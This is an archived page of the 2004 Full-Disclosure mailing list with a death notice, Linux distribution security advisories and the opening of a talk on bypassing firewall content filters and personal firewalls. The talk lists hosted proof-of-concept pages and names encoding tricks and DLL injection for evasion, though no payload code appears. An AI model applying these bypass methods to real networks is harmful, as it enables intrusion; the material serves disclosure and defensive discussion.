Maryland and their daughters, Resha and Stephanie; grandson of
Adrien and Cecile Blanchette of Montreal, Canada and John and
Ruth Heckaman of Indiana; grandson-in-law of Anastacia Quitania.
He was predeceased by a stepbrother Jonathan Ferraro. Also survived
by his aunts and uncles, Helene Blanchette (Denis Pare) and Pierre
Blanchette of Montreal, Canada, Nicole Blanchette (Brian Smith) of
London, Ont., Dorothy (Doc) Anderson of Illinois and by all his
extended family and friends in Montreal, Indiana, Maryland and
elsewhere. Matthew was an active duty PV2 of the United States
Army. A memorial service will be held at PUMPHREY.S COLONIAL FUNERAL
HOME, 300 West Montgomery Avenue (Rte 28 just off I-270, exit 6-A)
Rockville, MD on Saturday, October 30, 2004 at 1 PM. Inurnment service
with Military Honors will be held at Arlington National Cemetery
Columbarium on Thursday, November 4, 2004 at 10 AM.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [SECURITY] [DSA 574-1] New cabextract packages fix unintended directory traversal

debian-security-announcelists.debian.org
Date: Thu Oct 28 2004 - 00:09:04 CDT

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 574-1 securitydebian.org
http://www.debian.org/security/ Martin Schulze
October 28th, 2004 http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package : cabextract
Vulnerability : missing directory sanitising
Problem-Type : remote
Debian-specific: no
CVE ID : CAN-2004-0916
Debian Bug : 277522

The upstream developers discovered a problem in cabextract, a tool to
extract cabinet files. The program was able to overwrite files in
upper directories. This could lead an attacker to overwrite arbitrary
files.

For the stable distribution (woody) this problem has been fixed in
version 0.2-2b.

For the unstable distribution (sid) this problem has been fixed in
version 1.1-1.

We recommend that you upgrade your cabextract package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b.dsc
      Size/MD5 checksum: 568 72c81704917abe1f37ae4694392c97e3
    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b.diff.gz
      Size/MD5 checksum: 2314 d31e74e1186f00a60dc944bec28829f9
    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2.orig.tar.gz
      Size/MD5 checksum: 66136 8f59514ec67cfb43658c57c67c864b74

  Alpha architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_alpha.deb
      Size/MD5 checksum: 20344 2eba57f87ea2348e3e0322eb5d7ce3a5

  ARM architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_arm.deb
      Size/MD5 checksum: 16514 0c1b72dfef4454c9a4140d4728b6d56d

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_i386.deb
      Size/MD5 checksum: 15054 f0b5a915d31a51dbad5df5163c326204

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_ia64.deb
      Size/MD5 checksum: 23934 7a180cb2c7321533839d88edfde0664e

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_hppa.deb
      Size/MD5 checksum: 17784 50e507a1108c883a550f6b14b01238be

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_m68k.deb
      Size/MD5 checksum: 15034 e576be7c48a6217bc3d04f850b622ea9

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_mips.deb
      Size/MD5 checksum: 17948 427396df5074b07059f35d1603512423

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_mipsel.deb
      Size/MD5 checksum: 17884 de2d86ebeb9fdcaf58f99e403ca4ba86

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_powerpc.deb
      Size/MD5 checksum: 16572 f087bc23f1a5ff782ad4a15563482af0

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_s390.deb
      Size/MD5 checksum: 16658 44e78328ade15ef1b71fe5fec2738bc7

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/c/cabextract/cabextract_0.2-2b_sparc.deb
      Size/MD5 checksum: 18692 ad98229293a9a753db5d371cab657d06

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announcelists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBgH7wW5ql+IAeqTIRAo/oAKCp8cfa0FAGZccSf1Z/cThHrha8dACePC+c
RFwKfrysKwA898z3JLSmEGw=
=rbCk
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [ GLSA 200410-30 ] GPdf, KPDF, KOffice: Vulnerabilities in included xpdf

From: Thierry Carrez (koongentoo.org)
Date: Thu Oct 28 2004 - 02:28:05 CDT

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200410-30
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: GPdf, KPDF, KOffice: Vulnerabilities in included xpdf
      Date: October 28, 2004
      Bugs: #68558, #68665, #68571
        ID: 200410-30

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

GPdf, KPDF and KOffice all include vulnerable xpdf code to handle PDF
files, making them vulnerable to execution of arbitrary code upon
viewing a malicious PDF file.

Background
==========

GPdf is a Gnome-based PDF viewer. KPDF, part of the kdegraphics
package, is a KDE-based PDF viewer. KOffice is an integrated office
suite for KDE.

Affected packages
=================

    -------------------------------------------------------------------
     Package / Vulnerable / Unaffected
    -------------------------------------------------------------------
  1 app-office/koffice < 1.3.3-r1 >= 1.3.3-r1
  2 app-text/gpdf < 2.8.0-r1 >= 2.8.0-r1
                                                          *>= 0.132-r1
  3 kde-base/kdegraphics < 3.3.1-r1 >= 3.3.1-r1
                                                          *>= 3.3.0-r1
                                                          *>= 3.2.3-r1
    -------------------------------------------------------------------
     3 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

GPdf, KPDF and KOffice all include xpdf code to handle PDF files. xpdf
is vulnerable to multiple integer overflows, as described in GLSA
200410-20.

Impact
======

An attacker could entice a user to open a specially-crafted PDF file,
potentially resulting in execution of arbitrary code with the rights of
the user running the affected utility.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All GPdf users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-text/gpdf-0.132-r1"

All KDE users should upgrade to the latest version of kdegraphics:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=kde-base/kdegraphics-3.3.0-r1"

All KOffice users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-office/koffice-1.3.3-r1"

References
==========

  [ 1 ] GLSA 200410-20
        http://www.gentoo.org/security/en/glsa/glsa-200410-20.xml
  [ 2 ] CAN-2004-0888
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0888
  [ 3 ] CAN-2004-0889
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0889

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200410-30.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-9-1] tetex-bin vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Thu Oct 28 2004 - 01:08:47 CDT

===========================================================
Ubuntu Security Notice USN-9-1 October 27, 2004
tetex-bin vulnerabilities
CAN-2004-0888
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

tetex-bin

The problem can be corrected by upgrading the affected package to
version 2.0.2-21ubuntu0.1. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Chris Evans and Marcus Meissner recently discovered several integer
overflow vulnerabilities in xpdf, a viewer for PDF files. Because
tetex-bin contains xpdf code, it is also affected. These
vulnerabilities could be exploited by an attacker providing a
specially crafted TeX, LaTeX, or PDF file. Processing such a file with
pdflatex could result in abnormal program termination or the execution
of program code supplied by the attacker.

This bug could be exploited to gain the privileges of the user
invoking pdflatex.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1.diff.gz
      Size/MD5: 109940 a991d6b8fddbd78ad31ac5a46d79ed01
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1.dsc
      Size/MD5: 1062 4322b3e9094b0e44f22265593564f139
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2.orig.tar.gz
      Size/MD5: 11677169 8f02d5940bf02072ce5fe05429c90e63

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.1_amd64.deb
      Size/MD5: 72748 26a4fc82ba25ac5ca940a737041453b1
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.1_amd64.deb
      Size/MD5: 59692 73a8d7170b832199fd8d30c9ae97b4f1
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1_amd64.deb
      Size/MD5: 4327570 e2844193fedd86bcd8c47648b312cf34

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.1_i386.deb
      Size/MD5: 64828 d6e40f6dde8b8a0de67a3e09e996e9ae
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.1_i386.deb
      Size/MD5: 56096 c2afaf377ee1164b0c7ce88b0576af08
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1_i386.deb
      Size/MD5: 3811926 21d7b11851a2c74241a4b595d21ef561

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea-dev_2.0.2-21ubuntu0.1_powerpc.deb
      Size/MD5: 74898 3b5ced3706ba6bf1618cf128096e3dfc
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/libkpathsea3_2.0.2-21ubuntu0.1_powerpc.deb
      Size/MD5: 61010 f1c488019b4869fd5f417f5b11661569
    http://security.ubuntu.com/ubuntu/pool/main/t/tetex-bin/tetex-bin_2.0.2-21ubuntu0.1_powerpc.deb
      Size/MD5: 4349926 4a0aebf5a1c3a1ad0c6b8d6ab6a39e04

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBgIzvDecnbV4Fd/IRAmYaAKCOqeKaiXfBM8WSZMfsUB3/R3BJHACdGm96
slvU21a8xWVgtdm6j/n3owE=
=WF2I
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [USN-4-1] Standard C library script vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Thu Oct 28 2004 - 01:06:43 CDT

===========================================================
Ubuntu Security Notice USN-4-1 October 27, 2004
Standard C library script vulnerabilities
CAN-2004-0968
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libc6

The problem can be corrected by upgrading the affected package to
version 2.3.2.ds1-13ubuntu2.2. In general, a standard system upgrade
is sufficient to effect the necessary changes.

Details follow:

Recently, Trustix Secure Linux discovered some vulnerabilities in the
libc6 package. The utilities "catchsegv" and "glibcbug" created
temporary files in an insecure way, which allowed a symlink attack to
create or overwrite arbitrary files with the privileges of the user
invoking the program.

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.2.ds1-13ubuntu2.2.diff.gz
      Size/MD5: 1718601 cf6afbc349154329c272077c73ba9179
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.2.ds1-13ubuntu2.2.dsc
      Size/MD5: 1656 4c7cb8a913a57c4719b608c49c2d2b2e
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc_2.3.2.ds1.orig.tar.gz
      Size/MD5: 13246448 b982bf6ad7ebc8622d3b81d51c44b78a

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/glibc-doc_2.3.2.ds1-13ubuntu2.2_all.deb
      Size/MD5: 3839054 c45aae7010692177a047dc68a0892f7c
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/locales_2.3.2.ds1-13ubuntu2.2_all.deb
      Size/MD5: 3979842 272da092e74a39c4f15d10ddd1c3c2a0

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 9172938 0b62bf67b6b1ea70c2f1dce0a5a72e78
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 2961890 fca2ae9c057eefebceffc6eef5c44f8c
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 1318744 cae5a17fbbbf4d454aff91f028ba45bf
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 2429958 6111ed6e95b4d3106f516a0e910e6b7d
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.2.ds1-13ubuntu2.2_amd64.udeb
      Size/MD5: 953804 8c92652345079beea4059c2bd02cf0f6
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 5424778 591e999cfc9de47e655365f2a6bd5407
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.2.ds1-13ubuntu2.2_amd64.udeb
      Size/MD5: 8168 f007a3aa95bbe190e295ef04b98455b3
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.2.ds1-13ubuntu2.2_amd64.udeb
      Size/MD5: 15960 a50daa05546194f6d0a30d02bdd666a4
    http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.2.ds1-13ubuntu2.2_amd64.deb
      Size/MD5: 90622 3251a57ba6896b412e270ef812500e08

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 10199756 981e3d99127302b8955e0d0ecfc87189
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 2510202 4a0c6a6c253aeb99a9698c541de90db5
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-i686_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 944732 45839ff16f3668c6ef58a213c6d805b4
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 1015598 8c50383383de8d5f23236ce7211a0e11
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 1985400 3882b6b9f770ffe1e2bc3c7ab55c0c5e
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.2.ds1-13ubuntu2.2_i386.udeb
      Size/MD5: 691838 94ed23b75666c67bda94b9c07ce4a5a4
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 4844160 d5aebff13cd1eb6f4e29d68c38cd60ae
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.2.ds1-13ubuntu2.2_i386.udeb
      Size/MD5: 7702 03de6798940e807729f30a62aac2f7ec
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.2.ds1-13ubuntu2.2_i386.udeb
      Size/MD5: 13426 b932f23a4f9c3d776c6a7c26612a44d8
    http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.2.ds1-13ubuntu2.2_i386.deb
      Size/MD5: 88312 99d91c0cf770b202b37ed8ae0b131ed4

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dbg_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 9216664 64ef82237a246fa888980efa4ea3fe76
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-dev_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 3068930 ce32157ff282f9f48ffeba47bc4a7cc9
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-pic_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 1272340 804072cb7e38a128ab022f05c88bc456
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-prof_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 2582898 2c84b6bf455a4a7c3742307bb8c87c00
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6-udeb_2.3.2.ds1-13ubuntu2.2_powerpc.udeb
      Size/MD5: 946680 0ea82c88731a21d61b3a633b4eaffda8
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 4213364 4f0c8de536cd48d333e52cde5aa5a0e3
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-dns-udeb_2.3.2.ds1-13ubuntu2.2_powerpc.udeb
      Size/MD5: 8194 e90b76a0e762d97deddee338ea46c475
    http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libnss-files-udeb_2.3.2.ds1-13ubuntu2.2_powerpc.udeb
      Size/MD5: 14766 82dcd7f1abfac39464135522a96f1d42
    http://security.ubuntu.com/ubuntu/pool/universe/g/glibc/nscd_2.3.2.ds1-13ubuntu2.2_powerpc.deb
      Size/MD5: 89468 1debcc6600d1c3d4e60b1156178f99c7

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBgIxzDecnbV4Fd/IRAp1uAJ9RTKvSZ9454aCirBn+nEgl/2cLvwCg3gio
anTH7OMpQmxY75dz9+CW0Fo=
=CyGg
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Re: Death Notice: Matt Heckaman

From: Gary Kline (klinetao.thought.org)
Date: Thu Oct 28 2004 - 00:00:57 CDT

On Wed, Oct 27, 2004 at 11:11:20PM -0500, J.A. Terranson wrote:
>
> [Posted to a variety of places, as Matt was a prolific coder who
> maintained many ports and worked on literally dozens of projects]
>
> --
> Yours,
>
> J.A. Terranson
> sysadminmfn.org
> 0xBD4A95BF
>
> "An ill wind is stalking
> while evil stars whir
> and all the gold apples
> go bad to the core"
>
> S. Plath, Temper of Time
>
> ------------------------------------------------------------------------------
>
>
> http://obit.pumphreyfuneralhome.com/obit_display.cgi?id=161939&listing=Current
>
> Matthew Heckaman Ferraro
> Born in Mishawaka, IN on Jan. 4, 1982
> Departed on Oct. 20, 2004 and resided in Gaithersburg, MD.
>
> Memorial Service: Oct. 30, 2004
> Cemetery: Arlington National Cemetery Columbarium
> Please click on the links above for locations, times, maps, and
> directions.
>
>
> Matthew Heckaman Ferraro (age 22)
> Matthew of Gaithersburg, MD, formerly of Montreal Canada,
> passed away on Wednesday, October 20, 2004. He was the beloved
> husband of Stacie Jo Ferraro; loving son of Claire Ferraro
> (husband, Eddy) and Marshall Heckaman (wife, Sharon) of Indiana;
> loving brother of Andria, David and Allan; stepbrother of Cynthia
> Ferraro (Daniel Aston) son-in-law of Mike and Marjorie Bland of
> Maryland and their daughters, Resha and Stephanie; grandson of
> Adrien and Cecile Blanchette of Montreal, Canada and John and
> Ruth Heckaman of Indiana; grandson-in-law of Anastacia Quitania.
> He was predeceased by a stepbrother Jonathan Ferraro. Also survived
> by his aunts and uncles, Helene Blanchette (Denis Pare) and Pierre
> Blanchette of Montreal, Canada, Nicole Blanchette (Brian Smith) of
> London, Ont., Dorothy (Doc) Anderson of Illinois and by all his
> extended family and friends in Montreal, Indiana, Maryland and
> elsewhere. Matthew was an active duty PV2 of the United States
> Army. A memorial service will be held at PUMPHREY.S COLONIAL FUNERAL
> HOME, 300 West Montgomery Avenue (Rte 28 just off I-270, exit 6-A)
> Rockville, MD on Saturday, October 30, 2004 at 1 PM. Inurnment service
> with Military Honors will be held at Arlington National Cemetery
> Columbarium on Thursday, November 4, 2004 at 10 AM.
>

        thanks for this post; it honors matt. we're all the poorer
        for his death. we are all the richer for his having lived.
        ... .

        -g

--
   Gary Kline klinethought.org www.thought.org Public service Unix

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Presentation: Bypassing client application protection techniques with notepad

From: 3APA3A (3APA3ASECURITY.NNOV.RU)
Date: Thu Oct 28 2004 - 07:56:48 CDT

Topic: Bypassing client application protection techniques
Category: Protection bypass
Affected products:
 CheckPoint VPN-1(TM) & FireWall-1(R) NG with Application Intelligence
 (R55) HFA 9
 Microsoft Windows XP SP2
 Agnitum Outpost Pro 2.1, 2.5
 Tiny Firewall Pro v6.0.100
 ZoneAlarm Pro with Web Filtering v4.5.594
 BlackICE PC Protection 3.6
 Kerio Personal Firewall 4.0
 WRQ ATGuard 3.2
Authors:
 offtopic, <offtopicmail.ru>
 3APA3A, <3APA3Asecurity.nnov.ru>
Original link:
 http://www.security.nnov.ru/advisories/bypassing.asp
Special thanks to Igor U. Miturin for testing and coordinating
Checkpoint issues, to Checkpoint for cooperation, to Agnitum for
"opossum" topic public debates and some ideas.

Disclaimer:

</SARCASM>
This article is neither attempt to teach scriptkiddies to write trojans
nor attempt to create one by authors. It's a call to security community
to activate discussion on protection techniques for Internet client
application security. Yes, we want to fire a flame. We apologies we did
not contacted vendors on many issues they may consider as security
vulnerabilities in their products. We believe, to solve discussed
problem instead of fixing illustrating PoCs, all products must be
architecturally changed, not patched. Before architectural change any
schoolboy with scripting skills can get access to corporate network
protected by advertised product. We share a point of view, this should
not be treated as product vulnerability.
<SARCASM>
<APPLAUSE />
(yes, pedram).

1. Introduction

 1.1 Front end security

 Last years were revolutionary for network services infrastructure
 security. In addition to more secure and stable operation systems and
 services, we've got a lot of industrial solutions - stateful firewalls
 with level 7 inspection, intrusion detection and intrusion prevention
 systems, reliable clusters and distributed solutions to fight DDoS
 attacks... And we got actually nothing in the field of client
 application protection. Security of client network applications, such
 as browsers, mail and instant messaging agents is on the same level it
 was 5 years ago, and things became worse, because these applications
 are now critical for business, we can not simply stop using e-mail.
 <APPLAUSE />

 Client application security is very important, because same application
 can be used to process untrusted, potentially dangerous data as well
 as sensitive information.
 <OBJECTIONS FROM HALL, LEFT UNANSWERED />

 We, as many security professionals, have a feeling industry moves to
 wrong direction in the area of client application security. To
 demonstrate this point of view, this article was written. We discuss
 some methods of breaking into managed, protected corporate network
 without any special skills. "Exploits" illustrating this article were
 written with notepad.exe.

 1.2 What do you use to protect your client systems against Internet
 attack?

 There are very few widely deployed techniques. Among them are: content
 filtering on corporate firewall (including antiviral filtering) and
 personal antiviruses and personal firewalls (PFW). In addition to
 content filtering personal firewalls implement integrity control for
 applications and system by controlling integrity of the files, blocking
 access to some API functions and limiting network access to only
 trusted applications.

 Of cause, there are few really interesting approaches to secure client
 applications, some of them are discussed later, but usually these
 techniques are not generally used.

 1.3 What will we demonstrate.

 We will not teach you how to attack any specific client application.
 Latest Mozilla experience demonstrate, security bug in client
 application can always be found for approximately $500 (should we talk
 about Internet Explorer? Mozilla goes with discounted price because not
 demanded on zombi market). We will try to illustrate, that $500 is,
 probably, all that required to get access to your network. It doesn't
 depend on protection techniques listed above, because protection can be
 bypassed by any schoolboy. If this protection is all you have, you have
 no protection at all. In fact, iDefense makes more for community than
 any PWF vendor (it's not a joke): it pays for newly discovered security
 issue more than shadow market does. At least you have additional $500
 to your security this way.
 <LAUGHING, OBJECTIONS (LEFT UNANSWERED), APPLAUSE />
 </SARCASM>
 Problem of paid vulnerability research is not black-and-white like one
 can believe. Without commercial software or commercial services
 freeware would not survive, because good programmer needs money. Same
 tendencies are in vulnerability research. C'est la vie. We can discuss
 it.
 <SARCASM>
 Full-disclosure? Who believe in it...

 So, we proudly present you how to:

 Bypass content filtering for corporate and personal firewall (yes,
 again, and again and again).
 Bypass network access protection for personal firewall
 Bypass integrity protection for personal firewall or antivirus.

 Above is a list of tested products. It's incomplete. Some vendors were
 contacted and replied. Some fixes were published, but none of contacted
 vendors was able to fix all problems discussed. We do not belive it's
 possible in nearest future to prevent corporate network protected only
 with firewalls, personal firewalls and antiviruses from being hacked by
 the schoolboy.

<DEEP SILENCE />
<PUTTING MEAN BLACK HATS ON />
2. Bypassing content filtering again and again and again
 ____________________________________________________________
 Axiom: there is always one more way to bypass content filter.

 Explanation: because content filter and client application use
 different algorithms for data processing, there is always data
 processed differently by client application and content filter.

 2.1 Configuration used

 In our configuration we used content filtering features of 2 firewalls:
 Checkpoint as corporate firewall and Agnitum Outpost Pro as a personal
 firewall. Both firewalls were set to filter scripting and ActiveX
 elements. By using few techniques described in [1] we wrote a set of
 tests to attack Internet Explorer protected by these 2 firewalls (and
 additionally with 2 different antiviruses) on 2 different levels to
 execute javascript.

 2.2 Test descriptions:

  2.2.1 http://www.security.nnov.ru/files/opossum/test1.html
  Problem with special characters (0x0B) demonstrated. [1].II.9
 
  2.2.2 http://www.security.nnov.ru/files/opossum/test2.html
  Problem with RFC2781 decoding (UTF-16, little endian). [1].II.1

  2.2.3 http://www.security.nnov.ru/files/opossum/test3.html
  Problem with RFC2781 decoding (UTF-16, big endian). [1].II.1

  2.2.4 http://www.security.nnov.ru/files/opossum/test4.gif
  Different approach of different clients to content type definition [1].II.13
  
  2.2.5 http://www.security.nnov.ru/files/opossum/test5.gif
  Same as 2.2.4 + exploitation of stream buffering.

  2.2.6 http://www.security.nnov.ru/files/opossum/test6.html
  Problem with special characters (0x00) demonstrated. [1].II.9

  2.2.7 http://www.security.nnov.ru/files/opossum/test7.asp
  Inability to parse UTF-7 encoding (with Content-Type) [1].II.2

  2.2.8 http://www.security.nnov.ru/files/opossum/test8.html
  Inability to parse UTF-7 encoding (with Meta http-equiv) [1].II.2

  2.2.9 http://www.security.nnov.ru/files/opossum/test9.html
  Inability to catch scripting via expression(). Was described by
  http-equiv (malware.com).

  2.2.10. http://www.security.nnov.ru/files/opossum/test10.html
  Inability to catch scripting in styles [1].II.15
  
  2.2.11 http://www.security.nnov.ru/files/opossum/test11.mht
  Inability to parse MHT files (RFC 2557)

  Content filtering bypass techniques used are known for years. Outpost
  failed all tests. Checkpoint failed 2.2.2, 2.2.3, 2.2.6, 2.2.8, 2.2.9,
  2.2.10, 2.2.11.

 2.3 Vendors:

  Both Checkpoint and Agnitum were contacted. Checkpoint covers issues
  discussed in R55HFA10. 2.2.10 and 2.2.11 additionally require
  disabling CSS and MHT with special settings (I do not believe it can
  be accepted as solution). Agnitum fixes very few issues in Outpost 2.5
  version. Please, check your own content filter before blaming Agnitum
  or Checkpoint.

3. Bypassing network access restrictions with trusted application
 ____________________________________________________________
 Axiom: Malware is undistinguishable from user application

  Next step after successful client application attack is usually
  getting remote control on attacked computer.

  Personal firewall usually restricts access to network to the list of
  allowed application. In addition, integrity of these applications is
  controlled to prevent code insertion into executable file. It makes it
  impossible to install trojan application with direct network access.

  Common idea behind bypassing this protection is using trusted
  application (for example browser) to access external network. Usually,
  execution flow of target application with DLL injection technique,
  WriteProcessMemory(), CreateRemoteThread() or something like this. You
  can find description in [1] and [2]. These methods require programming
  skills, additionally, personal firewall could set a hooks to protect
  against this kind of attack. Additionally, trojan application in this
  case should implement almost all network functions, including
  network topology discovery and proxy communication.

